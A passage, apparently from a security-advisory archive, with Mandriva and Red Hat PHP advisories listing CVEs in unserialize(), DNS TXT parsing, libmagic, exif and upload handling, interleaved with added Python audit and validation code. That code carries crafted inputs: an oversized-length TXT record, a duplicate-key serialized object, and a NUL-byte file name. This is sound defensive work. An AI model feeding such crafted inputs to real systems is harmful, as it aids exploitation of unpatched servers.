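            pools[current] = {}
            continue
        if current is None or '=' not in line:
            continue
        key, value = (part.strip() for part in line.split('=', 1))
        pools[current][key] = value
    return pools


def mode_is_world_accessible(mode):
    """True when the 'other' class may read or write (i.e. connect to) the socket."""
    return bool(mode & (stat.S_IROTH | stat.S_IWOTH))


def audit_pool(directives):
    """Return a list of findings for one pool; an empty list means it passes."""
    findings = []
    if not directives.get('listen', '').startswith('/'):
        return findings  # TCP listener: socket file permissions do not apply
    mode = directives.get('listen.mode')
    if mode is None:
        findings.append('listen.mode unset (vulnerable builds default to 0666)')
    elif mode_is_world_accessible(int(mode, 8)):
        findings.append('listen.mode %s lets every local user connect' % mode)
    for key in ('listen.owner', 'listen.group'):
        if key not in directives:
            findings.append('%s unset; pin it to the web server account' % key)
    return findings


def audit_config(text):
    """Audit every pool in a pool file's text."""
    return {name: audit_pool(d) for name, d in parse_pool(text).items()}


def live_socket_is_world_accessible(path):
    """Same check against the socket file PHP-FPM actually created on this host."""
    st = os.stat(path)
    if not stat.S_ISSOCK(st.st_mode):
        raise ValueError('%s is not a UNIX socket' % path)
    return mode_is_world_accessible(stat.S_IMODE(st.st_mode))


if __name__ == '__main__':
    for label, text in (('weak', WEAK_POOL), ('hardened', HARDENED_POOL)):
        print(label, audit_config(text))
```

Run it against /etc/php-fpm.d/*.conf after the update and again with live_socket_is_world_accessible() on the listen path: the package fix changes the default, but an explicit listen.mode = 0666 carried over from an old pool file keeps the socket open to every local user.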
A flaw was found in the way file's Composite Document Files (CDF)
format parser handle CDF files with many summary info entries.
The cdf_unpack_summary_info() function unnecessarily repeatedly read
the info from the same offset. This led to many file_printf() calls in
cdf_file_property_info(), which caused file to use an excessive amount
of CPU time when parsing a specially-crafted CDF file (CVE-2014-0237).
A flaw was found in the way file parsed property information from
Composite Document Files (CDF) files. A property entry with 0 elements
triggers an infinite loop (CVE-2014-0238).
The unserialize() function in PHP before 5.4.30 and 5.5.14 has a Type
Confusion issue related to the SPL ArrayObject and SPLObjectStorage
Types (CVE-2014-3515).
It was discovered that PHP is vulnerable to a heap-based buffer
overflow in the DNS TXT record parsing. A malicious server or
man-in-the-middle attacker could possibly use this flaw to execute
arbitrary code as the PHP interpreter if a PHP application uses
dns_get_record() to perform a DNS query (CVE-2014-4049).
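For the dns_get_record() flaw (CVE-2014-4049) and the related CVE-2014-3597, the defect is a TXT record parser that copies as many bytes as each per-string length octet claims without checking how much RDATA is actually present. The parser below is an added example, not PHP's resolver code; it shows the bounds check the vulnerable code lacked, applied both to the RDLENGTH field and to every character-string inside it. The record bytes are constructed for the example.

```python
import struct

TYPE_TXT = 16


class MalformedRecord(ValueError):
    """Raised when a length field points past the data that is actually present."""


def parse_txt_rdata(rdata):
    """Parse TXT RDATA: a sequence of <length octet><that many octets>.

    Each length octet is checked against the bytes remaining in RDATA
    before anything is copied out. Trusting the octet is what let a
    malicious answer write past the heap buffer in the vulnerable code.
    """
    strings, pos = [], 0
    while pos < len(rdata):
        length = rdata[pos]
        pos += 1
        if pos + length > len(rdata):
            raise MalformedRecord(
                'character-string claims %d bytes, only %d remain'
                % (length, len(rdata) - pos))
        strings.append(rdata[pos:pos + length])
        pos += length
    return strings


def parse_rr_body(message, offset):
    """Parse TYPE, CLASS, TTL, RDLENGTH and RDATA of one resource record.

    `offset` must point just past the record's NAME (name decompression is
    out of scope here). Returns (rtype, parsed_rdata, next_offset).
    """
    if offset + 10 > len(message):
        raise MalformedRecord('truncated resource record header')
    rtype, rclass, ttl, rdlength = struct.unpack_from('!HHIH', message, offset)
    offset += 10
    if offset + rdlength > len(message):
        raise MalformedRecord('RDLENGTH %d runs past end of message' % rdlength)
    rdata = message[offset:offset + rdlength]
    parsed = parse_txt_rdata(rdata) if rtype == TYPE_TXT else rdata
    return rtype, parsed, offset + rdlength


def build_txt_rdata(strings):
    """Encode character-strings the way a legitimate server would."""
    out = b''
    for s in strings:
        if len(s) > 255:
            raise ValueError('character-string longer than 255 bytes')
        out += bytes([len(s)]) + s
    return out


def txt_is_malformed(rdata):
    try:
        parse_txt_rdata(rdata)
    except MalformedRecord:
        return True
    return False


# Constructed samples: a benign SPF answer, the same record wrapped in an RR
# body, and a record whose single length octet (0xff = 255) promises far
# more data than it carries.
GOOD_RDATA = build_txt_rdata([b'v=spf1 -all', b'second string'])
GOOD_RR = struct.pack('!HHIH', TYPE_TXT, 1, 300, len(GOOD_RDATA)) + GOOD_RDATA
CRAFTED_RDATA = b'\xff' + b'A' * 5
```

In C the equivalent of the slice in parse_txt_rdata is a memcpy of `length` bytes, so the `pos + length > len(rdata)` test is the whole fix; in Python a missing check would only truncate silently, which is why the example raises instead of returning a short string.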
A flaw was found in the way file parsed property information from
Composite Document Files (CDF) files, where the mconvert() function did
not correctly compute the truncated pascal string size (CVE-2014-3478).
Multiple flaws were found in the way file parsed property information
from Composite Document Files (CDF) files, due to insufficient boundary
checks on buffers (CVE-2014-0207, CVE-2014-3479, CVE-2014-3480,
CVE-2014-3487).
The phpinfo() function in PHP before 5.4.30 and 5.5.14 has a Type
Confusion issue that can cause it to leak arbitrary process memory
(CVE-2014-4721).
file before 5.19 does not properly restrict the amount of data read
during a regex search, which allows remote attackers to cause a
denial of service (CPU consumption) via a crafted file that triggers
backtracking during processing of an awk rule, due to an incomplete
fix for CVE-2013-7345 (CVE-2014-3538).
A further flaw in file's CDF parser exists because the fix for
CVE-2012-1571 was incomplete (CVE-2014-3587).
A further flaw in PHP's DNS record parsing exists because the fix for
CVE-2014-4049 was incomplete (CVE-2014-3597).
An integer overflow flaw in PHP's unserialize() function was
reported. If unserialize() were used on untrusted data, this
issue could lead to a crash or potentially information disclosure
(CVE-2014-3669).
A heap corruption issue was reported in PHP's exif_thumbnail()
function. A specially-crafted JPEG image could cause the PHP
interpreter to crash or, potentially, execute arbitrary code
(CVE-2014-3670).
If client-supplied input was passed to PHP's cURL client as a URL to
download, it could return local files from the server due to improper
handling of null bytes (PHP#68089).
An out-of-bounds read flaw was found in file's donote() function in the
way the file utility determined the note headers of an ELF file. This
could lead to a crash of the file executable (CVE-2014-3710).
A use-after-free flaw was found in PHP unserialize(). An untrusted
input could cause PHP interpreter to crash or, possibly, execute
arbitrary code when processed using unserialize() (CVE-2014-8142).
sapi/cgi/cgi_main.c in the CGI component in PHP before 5.5.21, when
mmap is used to read a .php file, does not properly consider the
mapping's length during processing of an invalid file that begins
with a # character and lacks a newline character, which causes an
out-of-bounds read and might allow remote attackers to obtain sensitive
information from php-cgi process memory by leveraging the ability to
upload a .php file or trigger unexpected code execution if a valid
PHP script is present in memory locations adjacent to the mapping
(CVE-2014-9427).
Free called on an uninitialized pointer in php-exif in PHP before
5.5.21 (CVE-2015-0232).
The readelf.c source file has been removed from PHP's bundled copy of
file's libmagic, eliminating exposure to denial of service issues in
ELF file parsing such as CVE-2014-8116, CVE-2014-8117, CVE-2014-9620
and CVE-2014-9621 in PHP's fileinfo module.
S. Paraschoudis discovered that PHP incorrectly handled memory in
the enchant binding (CVE-2014-9705).
Taoguang Chen discovered that PHP incorrectly handled unserializing
objects (CVE-2015-0273).
It was discovered that PHP incorrectly handled memory in the phar
extension (CVE-2015-2301).
Use-after-free vulnerability in the process_nested_data function in
ext/standard/var_unserializer.re in PHP before 5.4.37, 5.5.x before
5.5.21, and 5.6.x before 5.6.5 allows remote attackers to execute
arbitrary code via a crafted unserialize call that leverages improper
handling of duplicate numerical keys within the serialized properties
of an object. NOTE: this vulnerability exists because of an incomplete
fix for CVE-2014-8142 (CVE-2015-0231).
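Several entries above (CVE-2014-3515, CVE-2014-3669, CVE-2014-8142, CVE-2015-0231 and Taoguang Chen's unserialize report) are all reached through unserialize() on attacker-controlled bytes, so the first question in a review is whether such bytes reach unserialize() at all, and in what shape. The scanner below is an added example, not PHP's implementation: it walks the serialize() format without instantiating anything and reports object records, SPL-style custom (C:) records, back-references and duplicate keys inside one array or property list, the last being the shape CVE-2015-0231 describes. The payloads are constructed for the example and are not exploits.

```python
MAX_DEPTH = 64


class PhpSerializedScanner:
    """Walk a PHP serialize() payload without instantiating anything."""

    def __init__(self, data):
        self.data, self.pos, self.findings = data, 0, []

    def _expect(self, ch):
        if self.data[self.pos:self.pos + 1] != ch:
            raise ValueError('expected %r at offset %d' % (ch, self.pos))
        self.pos += 1

    def _read_until(self, stop):
        end = self.data.find(stop, self.pos)
        if end < 0:
            raise ValueError('unterminated token at offset %d' % self.pos)
        token, self.pos = self.data[self.pos:end], end + 1
        return token

    def _take(self, n):
        # Declared lengths are checked against the bytes actually present.
        if n < 0 or self.pos + n > len(self.data):
            raise ValueError('length %d runs past end of payload' % n)
        chunk, self.pos = self.data[self.pos:self.pos + n], self.pos + n
        return chunk

    def _members(self, count, depth, where):
        seen, members = set(), []
        for _ in range(count):
            key = self._value(depth + 1)
            if isinstance(key, (int, bytes)):
                if key in seen:
                    self.findings.append('duplicate key %r in %s' % (key, where))
                seen.add(key)
            else:
                self.findings.append('non-scalar key in %s' % where)
            members.append((key, self._value(depth + 1)))
        return members

    def _value(self, depth=0):
        if depth > MAX_DEPTH:
            raise ValueError('nesting deeper than %d levels' % MAX_DEPTH)
        tag = self._take(1)
        if tag == b'N':                        # N;
            self._expect(b';')
            return None
        if tag in (b'b', b'i', b'd'):          # b:1;  i:42;  d:1.5;
            self._expect(b':')
            raw = self._read_until(b';')
            return float(raw) if tag == b'd' else bool(int(raw)) if tag == b'b' else int(raw)
        if tag == b's':                        # s:5:"hello";
            self._expect(b':')
            n = int(self._read_until(b':'))
            self._expect(b'"')
            s = self._take(n)
            self._expect(b'"')
            self._expect(b';')
            return s
        if tag == b'a':                        # a:2:{key;value;key;value;}
            self._expect(b':')
            n = int(self._read_until(b':'))
            self._expect(b'{')
            items = self._members(n, depth, 'array')
            self._expect(b'}')
            return items
        if tag in (b'O', b'C'):                # O:8:"stdClass":1:{...}  C:11:"ArrayObject":21:{...}
            self._expect(b':')
            n = int(self._read_until(b':'))
            self._expect(b'"')
            cls = self._take(n).decode('latin-1')
            self._expect(b'"')
            self._expect(b':')
            count = int(self._read_until(b':'))
            self._expect(b'{')
            if tag == b'O':
                self.findings.append('instantiates class %s' % cls)
                body = self._members(count, depth, 'object %s' % cls)
            else:  # C: payload is opaque and handed to Class::unserialize()
                self.findings.append('custom unserialize of class %s' % cls)
                body = self._take(count)
            self._expect(b'}')
            return (tag.decode(), cls, body)
        if tag in (b'r', b'R'):                # r:3;  R:3;  back-references
            self._expect(b':')
            target = int(self._read_until(b';'))
            self.findings.append('reference to value #%d' % target)
            return ('ref', target)
        raise ValueError('unknown type tag %r at offset %d' % (tag, self.pos - 1))


def scan_php_serialized(data):
    """Return (parsed_value, findings); malformed input yields a 'malformed:' finding."""
    scanner = PhpSerializedScanner(data)
    try:
        value = scanner._value()
        if scanner.pos != len(data):
            scanner.findings.append('trailing bytes after value')
    except ValueError as exc:
        return None, ['malformed: %s' % exc] + scanner.findings
    return value, scanner.findings


# Constructed payloads: a plain session-style array, the duplicate-numeric-key
# object shape the advisories describe, and an SPL-style C: record.
SAFE_PAYLOAD = b'a:2:{s:4:"user";s:5:"alice";s:4:"role";s:6:"viewer";}'
DUP_KEY_PAYLOAD = b'O:8:"stdClass":2:{i:1;i:0;i:1;i:0;}'
CUSTOM_PAYLOAD = b'C:11:"ArrayObject":21:{x:i:0;a:0:{};m:a:0:{}}'
```

A payload that produces any finding at all should not be passed to unserialize(); if the application genuinely needs to round-trip data from clients, json_decode() gives it the scalars and arrays without the object-instantiation path that every one of the listed CVEs depends on.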
An integer overflow flaw, leading to a heap-based buffer overflow,
was found in the way libzip, which is embedded in PHP, processed
certain ZIP archives. If an attacker were able to supply a specially
crafted ZIP archive to an application using libzip, it could cause
the application to crash or, possibly, execute arbitrary code
(CVE-2015-2331).
It was discovered that the PHP opcache component incorrectly handled
memory (CVE-2015-1351).
It was discovered that the PHP PostgreSQL database extension
incorrectly handled certain pointers (CVE-2015-1352).
PHP contains a bundled copy of the file utility's libmagic library,
so it was vulnerable to the libmagic issues. The libzip packages
have been patched to address the CVE-2015-2331 flaw.
A bug in the php zip extension that could cause a crash has been fixed
(mga#13820).
Additionally, the jsonc and timezonedb packages have been upgraded to
the latest versions, and the PECL packages that required it have been
rebuilt against php-5.5.23.
_______________________________________________________________________
References:
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-7345
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0185
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0207
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0237
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0238
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-1943
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-2270
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3478
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3479
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3480
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3487
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3515
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3538
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3587
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3597
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3669
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3670
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3710
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-4049
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-4670
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-4698
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-4721
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-8116
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-8117
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-8142
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-9425
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-9427
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-9620
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-9621
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-9705
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0231
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0232
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0273
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-1351
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-1352
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-2301
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-2331
http://php.net/ChangeLog-5.php#5.5.9
http://php.net/ChangeLog-5.php#5.5.10
http://php.net/ChangeLog-5.php#5.5.11
http://php.net/ChangeLog-5.php#5.5.12
http://php.net/ChangeLog-5.php#5.5.13
http://php.net/ChangeLog-5.php#5.5.14
http://php.net/ChangeLog-5.php#5.5.15
http://php.net/ChangeLog-5.php#5.5.16
http://php.net/ChangeLog-5.php#5.5.17
http://php.net/ChangeLog-5.php#5.5.18
http://php.net/ChangeLog-5.php#5.5.19
http://php.net/ChangeLog-5.php#5.5.20
http://php.net/ChangeLog-5.php#5.5.21
http://php.net/ChangeLog-5.php#5.5.22
http://php.net/ChangeLog-5.php#5.5.23
http://www.ubuntu.com/usn/usn-2535-1/
http://www.ubuntu.com/usn/usn-2501-1/
https://bugzilla.redhat.com/show_bug.cgi?id=1204676
http://advisories.mageia.org/MGASA-2014-0163.html
http://advisories.mageia.org/MGASA-2014-0178.html
http://advisories.mageia.org/MGASA-2014-0215.html
http://advisories.mageia.org/MGASA-2014-0258.html
http://advisories.mageia.org/MGASA-2014-0284.html
http://advisories.mageia.org/MGASA-2014-0324.html
http://advisories.mageia.org/MGASA-2014-0367.html
http://advisories.mageia.org/MGASA-2014-0430.html
http://advisories.mageia.org/MGASA-2014-0441.html
http://advisories.mageia.org/MGASA-2014-0542.html
http://advisories.mageia.org/MGASA-2015-0040.html
https://bugs.mageia.org/show_bug.cgi?id=13820
_______________________________________________________________________
Updated Packages:
Mandriva Business Server 2/X86_64:
a4e09575e26b690bd44801a126795ce9 mbs2/x86_64/apache-mod_php-5.5.23-1.mbs2.x86_64.rpm
e156aaf446f543279f758b767e5ce6f2 mbs2/x86_64/lib64php5_common5-5.5.23-1.mbs2.x86_64.rpm
cf1653dd6b3606ff8983739fe7728502 mbs2/x86_64/lib64zip2-0.11.2-1.1.mbs2.x86_64.rpm
2ed6c588ca428a502ab995726d497527 mbs2/x86_64/lib64zip-devel-0.11.2-1.1.mbs2.x86_64.rpm
91fd4a50d38c904247519a34f71ac9a7 mbs2/x86_64/libzip-0.11.2-1.1.mbs2.x86_64.rpm
0fad2aa8ca3bed422588c7d7c349e3e7 mbs2/x86_64/php-bcmath-5.5.23-1.mbs2.x86_64.rpm
b797a14554b170f1f2c307eebd5011ce mbs2/x86_64/php-bz2-5.5.23-1.mbs2.x86_64.rpm
83abadd87c78c719b585acbfcbf1f54a mbs2/x86_64/php-calendar-5.5.23-1.mbs2.x86_64.rpm
71b728b5c58335c37e9ee059a98179b5 mbs2/x86_64/php-cgi-5.5.23-1.mbs2.x86_64.rpm
d6047e2545b396ad29b2619c3d811b49 mbs2/x86_64/php-cli-5.5.23-1.mbs2.x86_64.rpm
933344ca17f96bd844db47c993b8ce1a mbs2/x86_64/php-ctype-5.5.23-1.mbs2.x86_64.rpm
0278a991ed7a7ea1d51c6651b1157744 mbs2/x86_64/php-curl-5.5.23-1.mbs2.x86_64.rpm
a3f172d95d061f6a2ba9ce562f1068ac mbs2/x86_64/php-dba-5.5.23-1.mbs2.x86_64.rpm
d239cccc6594bfe8169c0b5300ca1dd0 mbs2/x86_64/php-devel-5.5.23-1.mbs2.x86_64.rpm
73a234b9c369a20c349fca7f425b405a mbs2/x86_64/php-doc-5.5.23-1.mbs2.noarch.rpm
ab4caa5f1a397e2f267479f08616d027 mbs2/x86_64/php-dom-5.5.23-1.mbs2.x86_64.rpm
016b8d010a1866935f2a6889b712300c mbs2/x86_64/php-enchant-5.5.23-1.mbs2.x86_64.rpm
f9bd5f358336ea8a997f85f4d690fd40 mbs2/x86_64/php-exif-5.5.23-1.mbs2.x86_64.rpm
9f0ef885d5e7abb84c1b0c6242bd1a54 mbs2/x86_64/php-fileinfo-5.5.23-1.mbs2.x86_64.rpm
f551fc699944abdbd78cd1f74e1db713 mbs2/x86_64/php-filter-5.5.23-1.mbs2.x86_64.rpm
10c6ad89a0707acdff025ee0166b4361 mbs2/x86_64/php-fpm-5.5.23-1.mbs2.x86_64.rpm
fad5946e3ff8bf1d3b7215fee229b934 mbs2/x86_64/php-ftp-5.5.23-1.mbs2.x86_64.rpm
c74071a614cc4f8d5ac612736264aad2 mbs2/x86_64/php-gd-5.5.23-1.mbs2.x86_64.rpm
788e0972b5aa918a0c8ce2b0e30270a6 mbs2/x86_64/php-gettext-5.5.23-1.mbs2.x86_64.rpm
996120d4c1fa233bdb38aedf0718f593 mbs2/x86_64/php-gmp-5.5.23-1.mbs2.x86_64.rpm
e032d9a3c8e078242347623f1ff51b5a mbs2/x86_64/php-hash-5.5.23-1.mbs2.x86_64.rpm
c1da3a1898b05995091ad1c2237bdf6a mbs2/x86_64/php-iconv-5.5.23-1.mbs2.x86_64.rpm
37b4a5d86006024878d397a8478d5a42 mbs2/x86_64/php-imap-5.5.23-1.mbs2.x86_64.rpm
bd10d9a55ee8db73b4d80dae1e14e4e0 mbs2/x86_64/php-ini-5.5.23-1.mbs2.x86_64.rpm
4cb54cd72bd26728bb29f5d00a5174af mbs2/x86_64/php-interbase-5.5.23-1.mbs2.x86_64.rpm
2713dca82ad94d88b379db3fa012ed2d mbs2/x86_64/php-intl-5.5.23-1.mbs2.x86_64.rpm
f0a9187b81e038400dae4e01123b751c mbs2/x86_64/php-json-5.5.23-1.mbs2.x86_64.rpm
c395a0cb573d9432c9e4c2a4b92d1d0f mbs2/x86_64/php-ldap-5.5.23-1.mbs2.x86_64.rpm
f2374e34b874072d2268acf1c72b383a mbs2/x86_64/php-mbstring-5.5.23-1.mbs2.x86_64.rpm
7ca3ce3a9464933af1a147c206c25d0d mbs2/x86_64/php-mcrypt-5.5.23-1.mbs2.x86_64.rpm
dbe828f1c2caa3eef932fc0c14a7e2e9 mbs2/x86_64/php-mssql-5.5.23-1.mbs2.x86_64.rpm
995e9f09906309252d850618c3fffaa6 mbs2/x86_64/php-mysql-5.5.23-1.mbs2.x86_64.rpm
c474c1f1dc45f14ea5357092277d2f22 mbs2/x86_64/php-mysqli-5.5.23-1.mbs2.x86_64.rpm
cdcb4872386b83ef3969f918bf99f941 mbs2/x86_64/php-mysqlnd-5.5.23-1.mbs2.x86_64.rpm
cbb1652273fb07f216c50b8d1b5445c2 mbs2/x86_64/php-odbc-5.5.23-1.mbs2.x86_64.rpm
29ab61a3d1d00ad57c875d87b62d2e12 mbs2/x86_64/php-opcache-5.5.23-1.mbs2.x86_64.rpm
349f796a960ef2207b30a06e386f2653 mbs2/x86_64/php-openssl-5.5.23-1.mbs2.x86_64.rpm
7a7411900384da8741e32a3f6f8036c2 mbs2/x86_64/php-pcntl-5.5.23-1.mbs2.x86_64.rpm
ba3b14e45177b257ada03f7ff4b16deb mbs2/x86_64/php-pdo-5.5.23-1.mbs2.x86_64.rpm
ae5b57dbff67c7595e154313321ff693 mbs2/x86_64/php-pdo_dblib-5.5.23-1.mbs2.x86_64.rpm
8782f71797f7cb271a514b735b19621a mbs2/x86_64/php-pdo_firebird-5.5.23-1.mbs2.x86_64.rpm
ac39db58d4100f3d2d24593d3b5907fc mbs2/x86_64/php-pdo_mysql-5.5.23-1.mbs2.x86_64.rpm
210b990793c2d616fb0aecc4fde28eb6 mbs2/x86_64/php-pdo_odbc-5.5.23-1.mbs2.x86_64.rpm
6ae4df7959ddd3a8a0724ddddbe41a71 mbs2/x86_64/php-pdo_pgsql-5.5.23-1.mbs2.x86_64.rpm
1f9bdab81fa668dd583abe873892993e mbs2/x86_64/php-pdo_sqlite-5.5.23-1.mbs2.x86_64.rpm
f0cbb5dde255f5c8fa3e04e3a5314ab1 mbs2/x86_64/php-pgsql-5.5.23-1.mbs2.x86_64.rpm
e46ac8c820911a6091540e135f103154 mbs2/x86_64/php-phar-5.5.23-1.mbs2.x86_64.rpm
5050a745bfc3b1f5eeced2dd85f79721 mbs2/x86_64/php-posix-5.5.23-1.mbs2.x86_64.rpm
c9093134a518c07f4e8a188987f853d3 mbs2/x86_64/php-readline-5.5.23-1.mbs2.x86_64.rpm
2b48c3f35573e00b5ba4327e8edc05f2 mbs2/x86_64/php-recode-5.5.23-1.mbs2.x86_64.rpm
ae2157230db4d6e28698db384c8f7fcb mbs2/x86_64/php-session-5.5.23-1.mbs2.x86_64.rpm
2610a739bfa29ff11e648c7baa1d8bc3 mbs2/x86_64/php-shmop-5.5.23-1.mbs2.x86_64.rpm
b7999e11cf9d2ab510263e32cabaf312 mbs2/x86_64/php-snmp-5.5.23-1.mbs2.x86_64.rpm
ab665c30f0d2f13baa1c6475b7df7cac mbs2/x86_64/php-soap-5.5.23-1.mbs2.x86_64.rpm
f331837ba716316cef094765a1700101 mbs2/x86_64/php-sockets-5.5.23-1.mbs2.x86_64.rpm
134f8bb18790bd023e73919a794703a0 mbs2/x86_64/php-sqlite3-5.5.23-1.mbs2.x86_64.rpm
4b4aa44d0ac56629610bb0444f199df5 mbs2/x86_64/php-sybase_ct-5.5.23-1.mbs2.x86_64.rpm
fc69f644f36308d81f37f356b76e40a1 mbs2/x86_64/php-sysvmsg-5.5.23-1.mbs2.x86_64.rpm
981b7ef6715aacfe9250b206dbbbad31 mbs2/x86_64/php-sysvsem-5.5.23-1.mbs2.x86_64.rpm
91c006555173d03f1d25899947702673 mbs2/x86_64/php-sysvshm-5.5.23-1.mbs2.x86_64.rpm
62e5fa5fa8b4d89d7835f2f68169af14 mbs2/x86_64/php-tidy-5.5.23-1.mbs2.x86_64.rpm
0c5a9237c710dd098c8bb56018f7a142 mbs2/x86_64/php-timezonedb-2015.1-1.mbs2.x86_64.rpm
d94aa68a9ce76bce5c962c58f37ac5a5 mbs2/x86_64/php-tokenizer-5.5.23-1.mbs2.x86_64.rpm
317c7da32daa223560dc08bbae89d98d mbs2/x86_64/php-wddx-5.5.23-1.mbs2.x86_64.rpm
9b2cf90dfc6f6bdc0431a6f94d43a947 mbs2/x86_64/php-xml-5.5.23-1.mbs2.x86_64.rpm
0a1b6e0beeb36f24f9250a352fbff1e9 mbs2/x86_64/php-xmlreader-5.5.23-1.mbs2.x86_64.rpm
598925bc71347774e805b6fcfcbcf590 mbs2/x86_64/php-xmlrpc-5.5.23-1.mbs2.x86_64.rpm
49a1f8e773e98bb101488b805670651c mbs2/x86_64/php-xmlwriter-5.5.23-1.mbs2.x86_64.rpm
0b7c2f2fe7b3103631dd07d12d443e06 mbs2/x86_64/php-xsl-5.5.23-1.mbs2.x86_64.rpm
5cb68626d863213de934655dac8342c8 mbs2/x86_64/php-zip-5.5.23-1.mbs2.x86_64.rpm
a27bab106c0ba87f220ff35937210a63 mbs2/x86_64/php-zlib-5.5.23-1.mbs2.x86_64.rpm
3dd6a6eeb12c7207446053e4785d6974 mbs2/SRPMS/libzip-0.11.2-1.1.mbs2.src.rpm
5d69769d822628a5bf1485eaa1251b8e mbs2/SRPMS/php-5.5.23-1.mbs2.src.rpm
0a629c11ca23ba56d57f61a754def293 mbs2/SRPMS/php-timezonedb-2015.1-1.mbs2.src.rpm
_______________________________________________________________________
To upgrade automatically use MandrivaUpdate or urpmi. The verification
of md5 checksums and GPG signatures is performed automatically for you.
All packages are signed by Mandriva for security.
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
=====================================================================
Red Hat Security Advisory
Synopsis: Moderate: php55 security and bug fix update
Advisory ID: RHSA-2015:1053-01
Product: Red Hat Software Collections
Advisory URL: https://rhn.redhat.com/errata/RHSA-2015-1053.html
Issue date: 2015-06-04
CVE Names: CVE-2014-8142 CVE-2014-9427 CVE-2014-9652
CVE-2014-9705 CVE-2014-9709 CVE-2015-0231
CVE-2015-0232 CVE-2015-0273 CVE-2015-1351
CVE-2015-1352 CVE-2015-2301 CVE-2015-2305
CVE-2015-2348 CVE-2015-2787 CVE-2015-4147
CVE-2015-4148
=====================================================================
1. Summary:
Updated php55 collection packages that fix multiple security issues and
several bugs are now available as part of Red Hat Software Collections 2.
Red Hat Product Security has rated this update as having Moderate security
impact. Common Vulnerability Scoring System (CVSS) base scores, which give
detailed severity ratings, are available for each vulnerability from the
CVE links in the References section.
2. Relevant releases/architectures:
Red Hat Software Collections for Red Hat Enterprise Linux Server (v. 6) - x86_64
Red Hat Software Collections for Red Hat Enterprise Linux Server (v. 7) - x86_64
Red Hat Software Collections for Red Hat Enterprise Linux Server EUS (v. 6.5) - x86_64
Red Hat Software Collections for Red Hat Enterprise Linux Server EUS (v. 6.6) - x86_64
Red Hat Software Collections for Red Hat Enterprise Linux Workstation (v. 6) - x86_64
Red Hat Software Collections for Red Hat Enterprise Linux Workstation (v. 7) - x86_64
3. Description:
PHP is an HTML-embedded scripting language commonly used with the Apache
HTTP Server. The php55 packages provide a recent stable release of PHP with
the PEAR 1.9.4, memcache 3.0.8, and mongo 1.4.5 PECL extensions, and a
number of additional utilities.
The php55 packages have been upgraded to upstream version 5.5.21, which
provides multiple bug fixes over the version shipped in Red Hat Software
Collections 1. (BZ#1057089)
The following security issues were fixed in the php55-php component:
An uninitialized pointer use flaw was found in PHP's Exif extension.
(CVE-2014-9705)
A heap buffer overflow flaw was found in PHP's regular expression
extension. (CVE-2015-2305)
A buffer over-read flaw was found in the GD library used by the PHP gd
extension. (CVE-2014-9709)
An attacker able to trigger a certain error condition in phar archive
processing could possibly use this flaw to disclose certain portions of
server memory. (CVE-2014-9652)
It was found that PHP move_uploaded_file() function did not properly handle
file names with a NULL character. (CVE-2015-2348)
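Both PHP#68089 in the Mandriva advisory above and CVE-2015-2348 here come down to a NUL byte in a client-supplied string being read differently by PHP and by the C code underneath it: the PHP-level check sees the whole string, the filesystem or cURL call stops at the NUL. The two validators below are an added example, not PHP's fix; they reject the NUL before the value reaches move_uploaded_file() or a cURL handle and, going a little beyond the advisories, also drop directory components, enforce an extension allow-list and restrict fetch URLs to http/https. The allowed extensions and schemes are assumptions for the example.

```python
import posixpath
from urllib.parse import urlsplit

# Assumptions for the example: the application accepts these upload types
# and only fetches remote content over HTTP(S).
ALLOWED_UPLOAD_EXT = {'.png', '.jpg', '.jpeg', '.pdf'}
ALLOWED_URL_SCHEMES = {'http', 'https'}


class RejectedInput(ValueError):
    """Raised for any client value that must not reach the filesystem or cURL."""


def safe_upload_name(client_name):
    """Turn a client-supplied file name into one that is safe to store.

    NUL and other control characters are rejected first: C-level path
    handling stops at the NUL, so 'shell.php\\0.png' would pass an
    extension check here but be written to disk as 'shell.php'.
    """
    if any(ord(ch) < 0x20 or ch == '\x7f' for ch in client_name):
        raise RejectedInput('control character in file name')
    name = posixpath.basename(client_name.replace('\\', '/'))  # drop any directory part
    if name in ('', '.', '..'):
        raise RejectedInput('empty or traversal file name')
    stem, ext = posixpath.splitext(name)
    ext = ext.lower()
    if ext not in ALLOWED_UPLOAD_EXT:
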